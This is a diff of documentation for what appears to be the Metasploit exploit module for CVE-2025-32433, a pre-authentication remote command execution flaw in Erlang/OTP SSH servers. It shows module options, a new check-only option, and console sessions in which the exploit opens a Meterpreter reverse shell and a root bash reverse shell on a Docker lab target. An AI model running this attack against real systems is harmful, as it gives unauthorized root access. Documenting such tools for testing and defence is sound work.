L-codes
diff --git a/‎documentation/modules/auxiliary/scanner/ssh/ssh_erlangotp.md‎
Lines changed: 0 additions & 78 deletions b/‎documentation/modules/auxiliary/scanner/ssh/ssh_erlangotp.md‎
Lines changed: 0 additions & 78 deletions
diff --git a/‎documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md‎
Lines changed: 42 additions & 70 deletions b/‎documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md‎
Lines changed: 42 additions & 70 deletions
@@ -11,9 +11,9 @@ versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
 
 ### Introduction
 
-This module exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
-that allows remote command execution. By sending crafted SSH packets, it executes a Metasploit
-payload to establish a reverse shell on the target system.
+This module detect and exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH
+servers that allows remote command execution. By sending crafted SSH packets, it executes a payload to
+establish a reverse shell on the target system.
 
 The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
 function without requiring authentication.
@@ -49,9 +49,15 @@ docker run -d -p 2223:2223 patched-ssh:latest
 3. Do: `set RHOSTS [IP]`
 4. Do: `run`
 
+## Options
+
+**CHECK_ONLY**
+
+Only check for vulnerability without exploiting. Default: `false`
+
 ## Scenarios
 
-### Target 0
+### Using linux commands (Target 0)
 
 Use the linux commands CMD.
 
@@ -60,10 +66,12 @@ msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options
 
 Module options (exploit/linux/ssh/ssh_erlangotp_rce):
 
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS  192.168.1.16     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT   2222             yes       The target port
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CHECK_ONLY  false            no        Only check for vulnerability without exploiting
+   RHOSTS      172.20.7.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       2222             yes       The target port (TCP)
+   THREADS     1                yes       The number of concurrent threads (max one per host)
 
 Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
 
@@ -76,14 +84,14 @@ Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
    FETCH_SRVHOST                      no        Local IP to use for serving payload
    FETCH_SRVPORT     8080             yes       Local port to use for serving payload
    FETCH_URIPATH                      no        Local URI to use for serving payload
-   LHOST             192.168.1.16     yes       The listen address (an interface may be specified)
+   LHOST             172.20.7.45      yes       The listen address (an interface may be specified)
    LPORT             4444             yes       The listen port
 
    When FETCH_FILELESS is false:
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_FILENAME      PBAcwEBEszFT     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      fxCcJWmo         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 Exploit target:
@@ -92,42 +100,23 @@ Exploit target:
    --  ----
    0   Linux Command
 
-
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/ssh/ssh_erlangotp_rce) > check
-[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
-[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
-[+] 192.168.1.16:2222 - The target is vulnerable.
-
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
-[*] Started reverse TCP handler on 192.168.1.16:4444 
-[*] 192.168.1.16:2222 - Running automatic check ("set AutoCheck false" to disable)
-[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
-[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
-[+] 192.168.1.16:2222 - The target is vulnerable.
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Starting exploit for CVE-2025-32433
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH banner...
-[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Payload sent successfully
+[*] Started reverse TCP handler on 172.20.7.45:4444 
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Starting exploit for CVE-2025-32433
+[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_KEXINIT...
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Payload sent successfully
 [*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.1.16:4444 -> 172.17.0.2:42718) at 2025-04-20 17:31:35 +0400
+[*] Meterpreter session 1 opened (172.20.7.45:4444 -> 172.17.0.2:37326) at 2025-04-25 10:18:19 +0400
 
 meterpreter > 
 ```
 
-### Target 1
+### Using unix commands (Target 1)
 
 Use the unix commands CMD.
 
@@ -136,16 +125,18 @@ msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options
 
 Module options (exploit/linux/ssh/ssh_erlangotp_rce):
 
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS  192.168.1.16     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT   2222             yes       The target port
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   CHECK_ONLY  false            no        Only check for vulnerability without exploiting
+   RHOSTS      172.20.7.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       2222             yes       The target port (TCP)
+   THREADS     1                yes       The number of concurrent threads (max one per host)
 
 Payload options (cmd/unix/reverse_bash):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.16     yes       The listen address (an interface may be specified)
+   LHOST  172.20.7.45      yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 Exploit target:
@@ -154,36 +145,17 @@ Exploit target:
    --  ----
    1   Unix Command
 
-
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/ssh/ssh_erlangotp_rce) > check
-[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
-[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
-[+] 192.168.1.16:2222 - The target is vulnerable.
-
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
-[*] Started reverse TCP handler on 192.168.1.16:4444 
-[*] 192.168.1.16:2222 - Running automatic check ("set AutoCheck false" to disable)
-[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
-[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
-[+] 192.168.1.16:2222 - The target is vulnerable.
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Starting exploit for CVE-2025-32433
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH banner...
-[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Payload sent successfully
-[*] Command shell session 3 opened (192.168.1.16:4444 -> 172.17.0.2:45134) at 2025-04-20 17:33:33 +0400
+[*] Started reverse TCP handler on 172.20.7.45:4444 
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Starting exploit for CVE-2025-32433
+[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_KEXINIT...
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Payload sent successfully
+[*] Command shell session 13 opened (172.20.7.45:4444 -> 172.17.0.2:44366) at 2025-04-25 10:21:05 +0400
 
 whoami
 root